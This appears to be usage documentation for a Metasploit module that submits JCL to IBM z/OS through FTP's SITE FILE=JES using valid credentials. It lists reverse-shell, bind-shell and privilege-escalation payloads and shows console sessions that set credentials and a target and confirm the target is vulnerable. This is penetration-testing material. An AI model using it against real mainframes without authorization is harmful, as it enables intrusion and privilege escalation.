z/OS JCL authorized FTP-base command execution - hints & tips

In order to use this exploit, you must have valid credentials on the target z/OS system.  The credentials must have access to upload files via FTP.  If in doubt, use the check function of the exploit.

## Vulnerable Application

This exploit was tested on the ftp daemons for z/OS version 1.13 / 2.1

## Payloads

If the exploit works, any JCL the user has rights to submit can be submitted.

See cmd type payloads under mainframe with jcl in the payload name, e.g.:

```
msf exploit(ftp_jcl_creds) > show payloads

Compatible Payloads
===================

   Name                             Disclosure Date  Rank    Description
   ----                             ---------------  ----    -----------
   cmd/mainframe/apf_privesc_jcl                     normal  JCL to escalate privileges via APF LIB
   cmd/mainframe/bind_shell_jcl                      normal  Z/OS (MVS) Command Shell, Bind TCP
   cmd/mainframe/generic_jcl                         normal  Generic JCL Test for Mainframe Exploits
   cmd/mainframe/reverse_shell_jcl                   normal  Z/OS (MVS) Command Shell, Reverse TCP
```

## Verification Steps

A successful check of the exploit will look like this:

```
msf exploit(ftp_jcl_creds) > set FTPUSER ftptest
FTPUSER => ftptest
msf exploit(ftp_jcl_creds) > set FTPPASS password
FTPPASS => password
msf exploit(ftp_jcl_creds) > set RHOST 10.10.10.1
RHOST => 10.10.10.1
msf exploit(ftp_jcl_creds) > info

       Name: FTP JCL Execution
     Module: exploit/mainframe/ftp/ftp_jcl_creds
   Platform: Mainframe
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2013-05-12

Available targets:
  Id  Name
  --  ----
  0   auto

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FTPPASS  password         no        The password for the specified username
  FTPUSER  ftptest          no        The username to authenticate as
  RHOST    10.10.10.1     yes       The target address
  RPORT    21               yes       The target port
  SLEEP    5                no        Time to wait before checking if job has completed.

Payload information:

Description:
  Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires
  valid credentials on the target system

msf exploit(ftp_jcl_creds) > check

[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
```


## Debugging

If the exploit or check is not working, turn on the VERBOSE and FTPDEBUG settings of the exploit and run.
The output should look similar to the below, on a vulnerable system.

```
msf exploit(ftp_jcl_creds) > set FTPDEBUG true
FTPDEBUG => true
msf exploit(ftp_jcl_creds) > set VERBOSE true
VERBOSE => true
msf exploit(ftp_jcl_creds) > check

[*] 10.10.10.1:21 - Connecting to FTP server 10.10.10.1:21...
[*] 10.10.10.1:21 - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n"
[*] 10.10.10.1:21 - Connected to target FTP server.
[*] 10.10.10.1:21 - Authenticating as ftptest with password password...
[*] 10.10.10.1:21 - FTP send: "USER ftptest\r\n"
[*] 10.10.10.1:21 - FTP recv: "331 Send password please.\r\n"
[*] 10.10.10.1:21 - Sending password...
[*] 10.10.10.1:21 - FTP send: "PASS password\r\n"
[*] 10.10.10.1:21 - FTP recv: "230 FTPTEST is logged on.  Working directory is \"FTPTEST.\".\r\n"
[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - FTP send: "site file=jes\r\n"
[*] 10.10.10.1:21 - FTP recv: "200 SITE command was accepted\r\n"
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
```

## Notes

The job run will leave a joblog for the credentials used.   
